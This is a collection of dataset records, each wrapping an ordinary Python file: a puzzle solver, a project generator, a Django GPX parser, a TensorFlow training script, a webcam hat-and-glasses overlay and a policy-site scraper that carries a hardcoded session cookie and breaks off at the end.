right\")\ngraph.set_xlabel(\"$n_{3}$\")\ngraph.set_title(\"$\\\\textrm{Marginal distribution of } n_{3}$\")\n\nfig.savefig(\"QSD-2-clones-n3.pdf\")\nfig.clear()\nplt.close(fig=\"all\")\n\n\nwith open(\"Established/Means.bin\", \"wb\") as file:\n pickle.dump(means, file)\n","sub_path":"Results/QSD/QSD-plots-established.py","file_name":"QSD-plots-established.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246837148","text":"# coding: utf-8\n\nimport sys\nimport codecs\n\nsys.stdin = codecs.getreader('cp932')(sys.stdin)\nsys.stdout = codecs.getwriter('cp932')(sys.stdout)\n\nCARD_MAX = 7\ncard = []\nboard = []\ncount = 0\n\n\ndef main():\n i = 0\n while i < CARD_MAX:\n i = i + 1\n card.append(i)\n board.append(0)\n board.append(0)\n print(str(board), str(card))\n\n search(1)\n\n\ndef search(z):\n global count\n for i in card:\n if (i != 0):\n # カード未使用\n pos = nextPos()\n if (pos != -1):\n if (setCard(i, pos)):\n if (nextPos() == -1):\n count = count + 1\n print(str(count).rjust(2), board)\n else:\n search(z + 1)\n rsetCard(i, pos)\n\n\ndef nextPos():\n i = 0\n while board[i] != 0:\n i = i + 1\n if (len(board) <= i):\n return -1\n return i\n\n\ndef setCard(num, pos):\n p1 = pos\n p2 = pos + num + 1\n if (len(board) > p2 and board[p1] == 0 and board[p2] == 0):\n card[num - 1] = 0\n board[p1] = num\n board[p2] = num\n return True\n else:\n return False\n\n\ndef rsetCard(num, pos):\n p1 = pos\n p2 = pos + num + 1\n\n card[num - 1] = num\n board[p1] = 0\n board[p2] = 0\n\n\nmain()\n","sub_path":"Python/Card.py","file_name":"Card.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"83458372","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# __author__: Ace.\n# __remark__: \n\nimport os\nimport time\n\nfrom lxml import objectify\nfrom lxml.objectify import ObjectifiedElement\n\nclass BaseGenerator(object):\n \"\"\" remark \"\"\"\n REAL_PATH_HEAD = None\n\n _BG_LANGUAGE = 'PythonDemo'\n _XML_ZIP_STRING = ''\n\n def __init__(self):\n \"\"\" remark \"\"\"\n self._obj = None\n pass\n\n def __lxml_objectify(self, name, author):\n \"\"\" remark \"\"\"\n if not self._XML_ZIP_STRING:\n raise Exception('xml is none.')\n\n xmls = self._XML_ZIP_STRING\n xmls = xmls.replace('@templ', name)\n xmls = xmls.replace('templ', name)\n xmls = xmls.replace('@author', author)\n\n dt = time.strftime(\"%Y.%m.%d\")\n xmls = xmls.replace('@time', dt)\n\n return objectify.fromstring(xmls)\n\n def __mkdir_all_folders(self, obj):\n \"\"\" remark \"\"\"\n if not hasattr(obj, 'pnodes'):\n tree = path = obj.attrib['name']\n else:\n tree = path = '%s/%s' % (obj.pnodes, obj.attrib['name'])\n\n if self.REAL_PATH_HEAD:\n path = self.REAL_PATH_HEAD + path\n\n if not os.path.exists(path):\n os.mkdir(path)\n print('[%s] folder is created.' % obj.attrib['name'])\n else:\n print('[%s] folder already exists.' % obj.attrib['name'])\n\n return tree, path\n\n def __mkfile_all_files(self, obj, path):\n \"\"\" remark \"\"\"\n if not hasattr(obj, 'file'): return\n\n for file in obj.file:\n fpath = '%s/%s' % (path, file.attrib['name'])\n if os.path.isfile(fpath):\n print('[%s] file already exists.' % file.attrib['name'])\n continue\n\n with open(fpath, 'w+') as fw:\n for line in file.line:\n if line.text:\n val = str(line.text).strip()\n if line.attrib.has_key('under'):\n val = val.replace('-', '_')\n else:\n val = ''\n\n if line.attrib.has_key('indent'):\n num = int(line.attrib['indent'])\n indent = ['\\t' for _ in range(num)]\n txt = ''.join(indent) + val + '\\n'\n else:\n txt = val + '\\n'\n\n fw.write(txt)\n\n print('[%s] file is created.' % file.attrib['name'])\n\n def _travers(self, obj):\n \"\"\" remark \"\"\"\n tree, path = self.__mkdir_all_folders(obj)\n self.__mkfile_all_files(obj, path)\n\n if not hasattr(obj, 'folder'):\n return\n\n for folder in obj.folder:\n if hasattr(obj, 'pnodes'):\n folder.pnodes = tree\n else:\n folder.pnodes = obj.attrib['name']\n self._travers(folder)\n\n def _notify(self):\n \"\"\" remark \"\"\"\n print('\\nall done.')\n\n @classmethod\n def suitable(cls, language):\n \"\"\" remark \"\"\"\n return cls._BG_LANGUAGE == language\n\n def doc_for_templ(self):\n \"\"\" remark \"\"\"\n pass\n\n def produce_all(self, name, author):\n \"\"\" remark \"\"\"\n obj = self.__lxml_objectify(name, author)\n\n if not isinstance(obj, ObjectifiedElement):\n raise Exception('xml objectify error.')\n else:\n print('templ is loaded.')\n\n self._travers(obj)\n self._notify()\n \n print('\\nstructure_for %s --doc-for-templ' % self._BG_LANGUAGE)\n print('it will show the purpose of each file.')","sub_path":"structure_for/generator/_basic.py","file_name":"_basic.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"579318665","text":"from xml.etree import cElementTree as ElementTree\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.gis.measure import Distance\nimport datetime\nfrom django.db import transaction\nfrom tracklog.models import *\nfrom django.contrib.gis.geos import Point\t# For instantiating point objects\nfrom math import pow, sqrt\nfrom tracklog.analyze import Analyze\n\n\n\n# example command to parse a trace: parsegpx.parse(file('/media/DATA/OmiaOhjelmia/Korkeusmalli/Malli/korkeus/data/EspKeskpuistoLyh.gpx'), 'Keskuspuisto', User.objects.get(username='kiikonen'))\n\n# TODO: multiple gpx-files into one Trip instance by appending!\n\n\n# The formatDate() function transforms the date string to the correct format for the save() function. Returns a string in the correct format.\n#correct format 'YYYY-MM-DD HH:MM:ss'. In gpx it is like '2010-09-25T06:14:35Z'\ndef formatDate(gpxdate):\n\t# Remove Z from the end of the datestring\n\tgpxdate = gpxdate.strip('Z')\n\n\ttry:\n\t\tdateobject = datetime.datetime.strptime(gpxdate, '%Y-%m-%dT%H:%M:%S')\n\n\t\tformatteddate = dateobject.strftime('%Y-%m-%d %H:%M:%S')\n\n\texcept exception:\n\t\traise DatetimeException() \n\t\t\n\treturn formatteddate\n\n\n# The formatPrefix() function transforms the version number string into element tag name prefix. Returns a string, which will appear in the tag names so the right tag can be found.\n# Tag prefix is like: '{http://path/number/another_number}'\ndef formatPrefix(version):\n\n\tversionnumbers = version.split('.')\n\n\tprefix = '{http://www.topografix.com/GPX/%(first)s/%(second)s}' % {'first':versionnumbers[0], 'second':versionnumbers[1]}\n\n\treturn prefix\n\n\n# Returns a DEM elevation from the database that is nearest to the given point location\n# Deprecated!\ndef getClosestDEMElevationOLD(p=None):\n\n\tpt = p.transform(ct=3067, clone=True)\n\n\tnearPoints = DEMPoint.objects.filter(geom__distance_lt=(pt, 8))\n\n\tnearElevs = [i.z for i in nearPoints]\n\n\tnumOfPoints = len(list(nearElevs))\n\n\t# If multiple points, calculate mean elevation\n\tif numOfPoints > 1:\n\t\televSum = 0\n\t\tfor i in nearElevs:\n\t\t\televSum += i\n\n\t\treturn elevSum / numOfPoints\n\n\t# If only one point, return it's elevation\n\telif numOfPoints == 1:\n\t\treturn nearElevs[0]\n\n\"\"\"\ndef getClosestDEMElevation(p=None):\n\n\tpt = p.transform(ct=3067, clone=True)\n\n\t\t# Build the primary key (xy) of the DEMPoint that is to be searched\n\n\tx = int(pt.x)\n\ty = int(pt.y)\n\n\t# Round x and y to the tens of meters\n\tx = roundToTens(x)\n\ty = roundToTens(y)\n\n\txy = x.__str__() + y.__str__()\n\n\tpointList = DEMPoint.objects.filter(pk=xy)\n\n\tif len(pointList) > 0:\n\t\treturn pointList[0].z\n\telse:\n\t\treturn None\n\n\"\"\"\n\n# Rounds a given integer to the accuracy of tens\ndef roundToTens(i):\n\tif (i % 10) < 5:\n\t\ti = i - (i % 10)\n\telif (i % 10) >= 5:\n\t\ti = i + (10 - i % 10)\n\treturn i\n\n\n# The parse() function is given the file, trip name and user as parameters.\n@transaction.commit_manually\ndef parse(f=None, name=None, user=None):\n\n\t# If a point doesn't have elevation information, it's elevation will be the constant NO_ELEVATION\n\tNO_ELEVATION = 9999\n\n\tif f is None:\t# If the file is not given\n\t\treturn None\t\t#!!! An exception could be thrown?\n\n\telse:\n\t\t# Variables for the tree and the root of the tree\n\t\ttree = ElementTree.parse(f)\n\t\troot = tree.getroot()\n\n\t\t# Get the version of the gpx and form the prefix for the tag names\n\t\tversion = root.get('version')\n\t\tprefix = formatPrefix(version)\n\t\t# For now on, tag names are formed with \"prefix+'tagname'\"\n\n\t\t# Dive into track segments. Segments contain trackpoints.\n\t\tsegments = root.find(prefix+'trk').findall(prefix+'trkseg')\n\n\t\t# Take the date for the trip from the first trackpoint in the gpx\n\t\ttripdate = formatDate(segments[0][0].find(prefix+'time').text)\n\n\t\t# Save Data and Trip instances to the database\n\t\ttrip = Trip(name=name, date=tripdate, user = user)\n\t\ttrip.save()\n\n\t\tdata = Data(date=datetime.datetime.now(), trip=trip, data_type=Data.RAW)\n\t\tdata.save()\n\t\t\n\t\t# Elevation corrected data\n\t\teleCorrData = Data(date=datetime.datetime.now(), trip=trip, data_type=Data.ELECORR)\n\t\teleCorrData.save()\n\n\t\ttransaction.commit()\n\n\t\t# Prepare the point saving loop\n\t\tn = 1\n\n\t\t# Variables for the cumulative value calculation\n\t\tcumdist = 0\n\t\tprevpoint = None\n\n\t\tcumtime = 0\n\t\tprevtime = datetime.datetime.strptime(tripdate, '%Y-%m-%d %H:%M:%S')\n\t\tspeed=0\n\n\t\tfor s in segments:\n\t\t\tfor p in s:\t# For every point in the current segment\n\t\t\t\t# Pick the coordinates, elevation and time\n\t\t\t\tx = p.attrib['lon']\n\t\t\t\ty = p.attrib['lat']\n\n\t\t\t\t# Initial previous point\n\t\t\t\tif prevpoint is None:\n\t\t\t\t\tprevpoint = Point(float(x), float(y), srid=4326)\n\n\t\t\t\t# Find elevation from gps-trace\n\t\t\t\televation = p.find(prefix+'ele')\n\t\t\t\tif elevation is not None:\n\t\t\t\t\televation = float(elevation.text)\n\t\t\t\telse:\n\t\t\t\t\televation = float(NO_ELEVATION)\n\n\t\t\t\ttime = formatDate(p.find(prefix+'time').text)\n\n\t\t\t\t# Update cumulative time\n\t\t\t\tdt= (datetime.datetime.strptime(time, '%Y-%m-%d %H:%M:%S') - prevtime).seconds\n\t\t\t\tcumtime = cumtime + dt\n\n\t\t\t\t# Update prevtime\n\t\t\t\tprevtime = datetime.datetime.strptime(time, '%Y-%m-%d %H:%M:%S')\n\n\t\t\t\tpointGeom = Point(float(x), float(y), srid=4326)\n\n\t\t\t\t# Update cumulative distance\n\t\t\t\ta = pointGeom.transform(ct=3067, clone=True).coords\n\t\t\t\tb = prevpoint.transform(ct=3067, clone=True).coords\n\n\t\t\t\tdist = sqrt(pow(a[0]-b[0],2)+pow(a[1]-b[1],2))\n\t\t\t\n\t\t\t\tcumdist = cumdist + dist\n\t\t\t\tif dt is not 0:\n\t\t\t\t\tspeed= abs(dist/dt)\n\n\t\t\t\t# Update prevpoint\n\t\t\t\tprevpoint = pointGeom\n\n\t\t\t\t# Instantiate the trackpoint and save it\n\t\t\t\tpoint = TrackPoint(ele=elevation, time=time, data=data, n=n, geom=pointGeom, cumtime=cumtime, cumdist=cumdist, speedFromPrevpoint=speed)\n\n\t\t\t\tpoint.save()\n\n\t\t\t\t\"\"\"# Instantiate the elevation corrected point and save it\n\t\t\t\tcorrEle = DEMPoint.closestDEMElevation(p=pointGeom)\n\n\t\t\t\tif corrEle is None:\n\t\t\t\t\tcorrEle = float(NO_ELEVATION)\n\n\t\t\t\tpoint = TrackPoint(ele=corrEle, time=time, data=eleCorrData, n=n, geom=pointGeom, cumtime=cumtime, cumdist=cumdist)\n\n\t\t\t\tpoint.save()\"\"\"\n\n\t\t\t\tn += 1\n\t\tdata.ready= True\n\t\tdata.save()\n\n\t\ttransaction.commit()\n\n\t\ttr=Analyze()\n\t\ttr.setTrip(trip)\n\t\tif settings.ON_OPENSHIFT:\n\t\t\ttr.start()\n\t\telse:\n\t\t\ttr.analyze()\n\n\t\n\nclass DatetimeException(Exception):\n\n\tpass\n","sub_path":"tracklog/parsegpx.py","file_name":"parsegpx.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"373999276","text":"# 全局变量\na=[1,2,3,4,5]\ndef li_demo():\n print()\nif __name__ == '__main__':\n print(a)\n# 局部变量\ndef li_demo():\n print()\nif __name__ == '__main__':\n a = [1, 2, 3, 4, 5]\n print(a)\n# 获取list长度方法 len()\ndef list_demo():\n print(clist)\nif __name__ == '__main__':\n clist = [1, 5, 6, 7]\n print(len(clist))\n\n# 删除方法 list.pop()\ndef pop_demo(alist):\n# pop()方法两个作用 第一个取出最后一位的值,第二个从列表中删除取出的值\n print(alist.pop())\n print(alist)\n#pop()带参数\n alist.pop(2)\n print(alist)\nif __name__ == '__main__':\n alist=[1,2,3,4,656]\n pop_demo(alist)\n\n# 讲列表排序方法\ndef orderBy_demo():\n # 正序\n sort_demo()\n # 倒序\n reverse_demo()\n\n# 正序方法\ndef sort_demo():\n #将blist正序排\n blist.sort()\n print(blist)\n#倒序方法\ndef reverse_demo():\n #将blist倒序排\n blist.reverse()\n print(blist)\n\n\n \nif __name__ == '__main__':\n blist=[1,2,3,45,89]\n orderBy_demo()","sub_path":"day01/base_type.py","file_name":"base_type.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"394811521","text":"''' Libraries from sample code '''\nimport json\nimport pickle\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\nfrom typing import Dict\nimport torch\nfrom tqdm import trange\nfrom dataset_slot import SeqClsDataset\nfrom utils_slot import Vocab\n\n\n''' Libraries added by me '''\nimport os, time\nfrom tqdm import tqdm\nimport numpy as np\n\nimport tensorflow as tf\nfrom torch.utils.data import DataLoader\n# from pytorch_model import SeqClassifier\nfrom tf_model_3 import SeqClassifier\n\n\n''' Parameters from sample code '''\nTRAIN = \"train\"\nDEV = \"eval\"\nSPLITS = [TRAIN, DEV]\n\n\n''' Functions '''\ndef parse_args() -> Namespace:\n\n now_time = time.strftime('%m%d_%H%M%S', time.localtime())\n\n parser = ArgumentParser()\n\n # data\n parser.add_argument(\"--max_len\", type=int, default=35)\n\n # model\n parser.add_argument(\"--hidden_size\", type=int, default=1024)\n parser.add_argument(\"--num_layers\", type=int, default=4)\n parser.add_argument(\"--dropout\", type=float, default=0.1)\n parser.add_argument(\"--bidirectional\", type=bool, default=True)\n\n # optimizer\n parser.add_argument(\"--lr\", type=float, default=1e-6)\n parser.add_argument(\"--decay_rate\", type=float, default=0.9)\n\n # data loader\n parser.add_argument(\"--batch_size\", type=int, default=128)\n\n # training\n parser.add_argument(\n \"--device\", type=torch.device,\n help=\"cpu, cuda, cuda:0, cuda:1\", default=\"cuda\")\n parser.add_argument(\"--num_epoch\", type=int, default=500)\n parser.add_argument(\"--patience\", type=int, default=25)\n parser.add_argument(\"--restore_best_weights\", type=bool, default=False)\n\n # path\n parser.add_argument(\n \"--data_dir\", type=Path, help=\"Directory to the dataset.\",\n default=\"./data/slot\")\n parser.add_argument(\n \"--cache_dir\", type=Path, help=\"Directory to the preprocessed caches.\",\n default=\"./cache/slot\")\n parser.add_argument(\n \"--ckpt_dir\", type=Path, help=\"Directory to save the model file.\",\n default=f\"./ckpt/slot/{now_time}\")\n parser.add_argument(\n \"--logs_dir\", type=Path, help=\"Directory to save the logs file.\",\n default=f\"./logs/slot/{now_time}\")\n\n args = parser.parse_args()\n return args\n\n\ndef save_args(args):\n d = vars(args)\n with open(f\"{args.ckpt_dir}/args.txt\", mode='w') as f:\n for key in d.keys():\n f.write(f\"{key:20}: {d[key]}\\n\")\n return\n \n\ndef __get_data(cache_dir) -> Dict[str, DataLoader]:\n\n with open(args.cache_dir / \"vocab.pkl\", \"rb\") as f:\n vocab: Vocab = pickle.load(f)\n\n tag_idx_path = args.cache_dir / \"tag2idx.json\"\n tag2idx: Dict[str, int] = json.loads(tag_idx_path.read_text())\n\n data_paths = {split: args.data_dir / f\"{split}.json\" for split in SPLITS}\n data = {split: json.loads(path.read_text()) for split, path in data_paths.items()}\n datasets: Dict[str, SeqClsDataset] = {\n split: SeqClsDataset(split_data, vocab, tag2idx, args.max_len)\n for split, split_data in data.items()\n }\n\n # TODO: crecate DataLoader for train / dev datasets # Done\n data_loaders: Dict[str, DataLoader] = {\n split: DataLoader(\n split_dataset,\n batch_size = 7244,\n shuffle = False,\n collate_fn = split_dataset.collate_fn\n ) for split, split_dataset in datasets.items()\n }\n\n return datasets, data_loaders\n\n\ndef custom_loss(y_true, y_pred):\n cce = tf.keras.losses.CategoricalCrossentropy()\n # losses = tf.convert_to_tensor(0, dtype=tf.float32)\n # for batch_i in range(tf.shape(y_true)[0]):\n # losses += cce(y_true[batch_i], y_pred[batch_i])\n # losses /= tf.cast(tf.shape(y_true)[0], dtype=tf.float32)\n # print(losses, cce(y_true, y_pred))\n # return losses\n return cce(y_true, y_pred)\n\n\ndef main(args):\n \n datasets, data_loaders = __get_data(args.cache_dir)\n\n for d in data_loaders[TRAIN]:\n train_X = tf.convert_to_tensor(d['encoded_tokens'], dtype=tf.float32)\n train_Y = tf.convert_to_tensor(d['tag_one_hot'], dtype=tf.float32)\n\n for d in data_loaders[DEV]:\n valid_X = tf.convert_to_tensor(d['encoded_tokens'], dtype=tf.float32)\n valid_Y = tf.convert_to_tensor(d['tag_one_hot'], dtype=tf.float32)\n\n embeddings = tf.convert_to_tensor(torch.load(args.cache_dir / \"embeddings.pt\"))\n model = SeqClassifier(\n mode='slot', # Added by me\n text_len=args.max_len, # Added by me\n embeddings=embeddings,\n batch_size=args.batch_size, # Added by me\n dropout=args.dropout,\n hidden_size=args.hidden_size,\n num_layers=args.num_layers,\n bidirectional=args.bidirectional,\n num_class=datasets[TRAIN].num_classes,\n )\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=args.lr,\n decay_steps=10000,\n decay_rate=args.decay_rate\n )\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=lr_schedule),\n # loss=custom_loss,\n loss=tf.keras.losses.CategoricalCrossentropy(reduction=tf.keras.losses.Reduction.SUM),\n metrics=[\"accuracy\"],\n # run_eagerly=True\n )\n\n callbacks = [\n # MCP_ValLoss\n tf.keras.callbacks.ModelCheckpoint(\n f\"{args.ckpt_dir}/MinValLoss.h5\",\n monitor='val_loss', mode='min', verbose=1,\n save_best_only=True # , save_weights_only=True\n ),\n # MCP_ValAcc\n tf.keras.callbacks.ModelCheckpoint(\n f\"{args.ckpt_dir}/MaxValAcc.h5\",\n monitor='val_accuracy', mode='max', verbose=1,\n save_best_only=True # , save_weights_only=True\n ),\n # # ES_ValLoss\n # tf.keras.callbacks.EarlyStopping(\n # monitor='val_loss', mode='min',\n # verbose=1, patience=args.patience,\n # restore_best_weights=args.restore_best_weights\n # ),\n # ES_ValAcc\n tf.keras.callbacks.EarlyStopping(\n monitor='val_accuracy', mode='max',\n verbose=1, patience=args.patience,\n restore_best_weights=args.restore_best_weights\n # baseline=0.85022\n ),\n # TB\n tf.keras.callbacks.TensorBoard(\n log_dir=args.logs_dir,\n write_graph=True, write_images=True,\n )\n ]\n\n # time.sleep(3)\n os.system('clear')\n os.system('clear')\n\n # print args\n print(\"\\n\")\n d = vars(args)\n for key in d.keys():\n print(f\"{key:20}: {d[key]}\")\n print(\"\\n\")\n\n history = model.fit(\n x=train_X,\n y=train_Y,\n batch_size=args.batch_size,\n epochs=args.num_epoch,\n verbose=1,\n callbacks=callbacks,\n validation_data=(valid_X, valid_Y),\n shuffle=True,\n )\n\n Min_ValLoss = min(history.history['val_loss'])\n MVL_ValAcc = history.history['val_accuracy'][history.history['val_loss'].index(Min_ValLoss)]\n print(f\"\\n\\nMin val_loss: {Min_ValLoss} ({Min_ValLoss:.5f}) --> val_accuracy: {MVL_ValAcc} ({MVL_ValAcc*100:.3f}%)\")\n\n Max_ValAcc = max(history.history['val_accuracy'])\n MVA_ValLoss = history.history['val_loss'][history.history['val_accuracy'].index(Max_ValAcc)]\n print(f\"\\n\\nMax val_accuracy: {Max_ValAcc} ({Max_ValAcc*100:.3f}%) --> val_loss: {MVA_ValLoss} ({MVA_ValLoss:.5f})\")\n\n print(\"\\n\")\n args.ckpt_dir.rename(f\"{args.ckpt_dir}_{Min_ValLoss:.5f}-{MVL_ValAcc*100:.3f}%_{Max_ValAcc*100:.3f}%-{MVA_ValLoss:.5f}\")\n\n # TODO: Inference on test set\n return\n\n\n''' Execution '''\nif __name__ == \"__main__\":\n args = parse_args()\n args.ckpt_dir = Path(f\"{args.ckpt_dir}_numlayers={args.num_layers}\")\n args.ckpt_dir.mkdir(parents=True, exist_ok=True)\n args.logs_dir = Path(f\"{args.logs_dir}_numlayers={args.num_layers}\")\n args.logs_dir.mkdir(parents=True, exist_ok=True)\n save_args(args)\n main(args)","sub_path":"development/train_slot.py","file_name":"train_slot.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"19877757","text":"import cv2\nimport os\nimport face_recognition as fr\nfrom PIL import Image\n\ndef load_resources(path):\n files = os.listdir(path)\n templates = []\n for file_path in files:\n if '.png' in file_path:\n relative_path = os.path.join(path, file_path)\n templates.append(cv2.imread(relative_path, -1))\n print (templates[-1].shape)\n return templates\n\ndef add_glasses(img, glasses, rate, cnt):\n face_cascade = cv2.CascadeClassifier('/home/york_io/.local/lib/python3.6/site-packages/cv2/data/haarcascade_frontalface_default.xml')\n eye_cascade = cv2.CascadeClassifier('/home/york_io/.local/lib/python3.6/site-packages/cv2/data/haarcascade_eye.xml')\n face_locs = []\n face_locs = []\n hat_locs = []\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face_locs = face_cascade.detectMultiScale(gray, 1.3, 5)\n for loc in face_locs:\n x, y, w, h = loc\n roi_gray = gray[y:y+h, x:x+w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n if (len(eyes) < 2):\n continue\n expected_y = h // 3\n best_y = 123456789\n for eye in eyes:\n if abs(y - expected_y) < abs(best_y - expected_y):\n best_y = eye[1]\n gw = int(w * 0.9)\n delta = (w - gw) // 2\n print(glasses.shape)\n gh = int(gw / glasses.shape[1] * glasses.shape[0])\n gx = x + int(delta * 1.2)\n gy = y + expected_y - int(0.15 * gh)\n if gx < 0 or gy < 0:\n continue\n glass_img = cv2.resize(glasses, (gw, gh))\n for yi in range(gy, gy + gh):\n for xi in range(gx, gx + gw):\n if glass_img[yi - gy, xi - gx, 3] != 0:\n img[yi, xi] = glass_img[yi - gy, xi - gx, 0:3]\n return face_locs, hat_locs, img\n\ndef add_hat(img, hat_templ, rate, cnt):\n face_cascade = cv2.CascadeClassifier('/home/york_io/.local/lib/python3.6/site-packages/cv2/data/haarcascade_frontalface_default.xml')\n face_locs = []\n hat_locs = []\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face_locs = face_cascade.detectMultiScale(gray, 1.3, 5)\n for loc in face_locs:\n width_scaled = int(loc[2] * 1.5)\n width_original = hat_templ.shape[1]\n scale_factor = width_scaled / width_original\n estimated_height = int(hat_templ.shape[0] * scale_factor / 1.5)\n delta = int(0.2 * estimated_height)\n x, y, w, h = loc\n hat_locs.append([y - estimated_height + delta, x + w, y + delta, x])\n for hat_loc in hat_locs:\n if hat_loc[0] < 0:\n continue\n t, r, b, l = hat_loc\n w = r - l\n h = b - t\n hat_img = cv2.resize(hat_templ, (w, h))\n for y in range(t, b):\n for x in range(l, r):\n if hat_img[y - t, x - l, 3] != 0:\n img[y, x] = hat_img[y - t, x - l, 0:3]\n return face_locs, hat_locs, img\n\n\ndef show_webcam(templ, process, rate = 5):\n cam = cv2.VideoCapture(0)\n cnt = 0\n face_locs = []\n while True:\n ret_val, img = cam.read()\n face_locs, obj_locs, img = process(img, templ, rate, cnt)\n cv2.imshow('my webcam', img)\n if cv2.waitKey(1) == 27:\n break # esc to quit\n cnt += 1\n cv2.destroyAllWindows()\n\n\ndef main():\n hat_templ = load_resources('hat_resources')\n glass_templ = load_resources('glass_resources')\n for t in glass_templ:\n show_webcam(t, add_glasses, rate=3)\n for t in hat_templ:\n show_webcam(t, add_hat, rate=3)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"glasses.py","file_name":"glasses.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"139622597","text":"import os\nimport requests\nfrom lxml import etree\nimport config\nimport public_fun\n\n\ndef handle(search_word, page, s_date):\n '''\n 获取搜索结果中的文章url\n :param search_word: 搜素关键词\n :param page: 页数\n :return:\n '''\n url = 'http://www.bailuzhiku.com/policy/listResult'\n headers = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n 'Connection': 'keep-alive',\n 'Content-Length': '249',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Cookie': 'UM_distinctid=174b08f0e9f751-046de8b491666e-f7b1332-1fa400-174b08f0ea0753; Hm_lvt_ec196724ce16461e3c277405b7fd5b34=1600690000,1600954535; ASP.NET_SessionId=4rbp124yzypezle4rhpto2ha; CNZZDATA1271635556=2128017459-1600685978-%7C1600961875; login=0AB50DBC033234B887CC04C65CEFDB55DCF4C4D20E676E2871DB5D62CB6E694AE5E7C5FBE096B4CFB0F94A6078317AF2A666E0BBFE4462E589B5A01AAD274038017190521182DE351C4015B5A3BFF55D0D06B214586270CC875C8AFFB237FEF1F14537703D6AECE7D7B1E688FA26A3159ED956F104017DD3648BF4C1A081735331FFFD9D0B7E6A1C504440004CF4B1C1295F39C0; Hm_lpvt_ec196724ce16461e3c277405b7fd5b34=1600962708',\n 'Host': 'www.bailuzhiku.com',\n 'Origin': 'http://www.bailuzhiku.com',\n 'Referer': 'http://www.bailuzhiku.com/policy/list?keyword=%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest',\n\n }\n form_data = {\n 'pageSize': '20',\n 'Keyword': search_word,\n 'Type': '0',\n 'IsJoinGov': '0',\n 'IsQueryDate': '0',\n 'EngSortType': '0',\n 'EngSearchType': '0',\n 'PageIndex': page,\n 'PageSize': 20,\n 'RowsCount': '0'\n }\n index_url2 = 'http://www.bailuzhiku.com{}'\n res = requests.post(url=url, headers=headers, data=form_data)\n res.encoding = res.apparent_encoding\n html = etree.HTML(res.text)\n data = html.xpath('//*[@class=\"newsList\"]/h3/a/@href')\n date = html.xpath('//*[@class=\"clearfix\"]/li[1]/span/text()')\n result = []\n if data:\n pages = page + 1 if data else 0\n for d in range(len(data)):\n if public_fun.calc_date(s_date=s_date, e_date=date[d]):\n result.append(index_url2.format(data[d]))\n return result, pages\n else:\n print('url1 404错误:', res.status_code, url)\n return [], 0\n\n\ndef get_data(url, search_word, max_text):\n '''\n 1. 网站来源 “source”(白鲸出海“bjch”/未来智库“wlzk”……)\n 2. 文章ID “doc_id”(在所爬取的网页的id)\n 3. 发表日期 “date”(格式:20200129)\n 4. 下载url “download_url”\n 5. 作者/机构 “org_name”(如 xx券商/xx证券)\n 6. 页数/字数 “page_num”/ “word_count”,如果有pdf文件就用页数,没有就用字数\n 7. 资料种类 “doc_type”(研报: “EXTERNAL_REPORT”/咨询: “NEWS”)\n 8. 文章标题 “title” (\"中芯国际:首次公开发行股票并在科创板上市招股说明书\")\n :param search_word: 搜索关键词\n :param url:url2 文章内容链接\n :return:\n '''\n json_result = {'source': 'blzk', 'doc_id': '', 'date': '', 'download_url': '',\n 'org_name': '', 'page_num': '1', 'doc_type': 'NEW', 'title': ''}\n path = os.path.join(config.SAVE_PATH, search_word, 'news', 'bailuzhiku')\n res = requests.get(url=url, headers=config.HEADERS)\n html = etree.HTML(res.text)\n content_text = public_fun.filter_space_json(html.xpath('//*[@class=\"textarea-box policy-textarea\"]//text()'))\n if len(content_text) > max_text:\n try:\n doc_id = url.split('/')[-1].replace('.html', '') # 文章ID\n title = html.xpath('//*[@class=\"policy-wrap-title\"]/h1')[0] # 文章标题\n description = html.xpath('//*[@class=\"textarea-box policy-textarea\"]')[0] # 文章内容\n html_list = [title, description]\n html_result = public_fun.filter_space_html(html_list)\n json_result['doc_id'] = doc_id\n json_result['date'] = public_fun.filter_space_json(\n html.xpath('//*[@class=\"attribute-table\"]/tbody/tr[2]/td[1]/div/text()')[0]\n .replace('-', ''))\n json_result['download_url'] = 'http://www.bailuzhiku.com/' + \\\n html.xpath('//*[@class=\"header-tool-link download\"]/@href')[0]\n try:\n json_result['org_name'] = public_fun.filter_space_json(\n html.xpath('//*[@class=\"attribute-table\"]/tbody/tr[1]/td[1]/div/text()')[0])\n except:\n json_result['org_name'] = ''\n json_result['title'] = public_fun.filter_space_json(html.xpath('//h1[@class=\"title\"]/text()')[0])\n public_fun.write_down_json(path=path, filename=doc_id + '.json', text=json_result)\n public_fun.write_down_html(path=path, filename=doc_id + '.html', text=html_result)\n except Exception as e:\n print(e.__traceback__.tb_lineno, url, e)\n else:\n 